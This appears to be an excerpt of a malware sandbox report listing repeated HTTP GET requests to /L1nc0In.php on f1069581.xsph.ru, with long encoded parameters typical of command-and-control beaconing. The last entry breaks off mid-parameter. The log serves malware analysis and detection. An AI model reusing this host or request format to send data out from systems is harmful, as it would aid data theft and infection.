Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=d1nIiojI0EWZiVTYzATYmVWZlRjZlRWZwgzY4ITOhdTY3EWOmJmIsIiZ4MjZxIzNhBzYxgzN4cTOiN2M3YWNhNGMzUjM5YDOyAjZjFDN5cjNiojImdTNyEWO4EDO1gTM0AjZmNjM5MjN2YmNyUzM3UDM1MjIsIiNkZ2N4EjM0MmM3MDZkNTMmNTM4IGMkJmYhJDOlVjNzMjZ1UmYiFWZiojIxYWY5UmYjNDM5YTZzATZlV2M0czY0EWNhRjYxcjY4UmI7xSfiElZx8maJBjVzIGbxcVYVJEWaxGeyUVa3lWSuVzVhdnVXp1cOxWS2kUejFjUYlFMOZVZwwWbkBnUzklQKNETplUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIlhDZlVTYlRDOyUzMmZWM2QGOzMGOzATN4cDN4MjMiNzY2UGMzUGOxIiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMk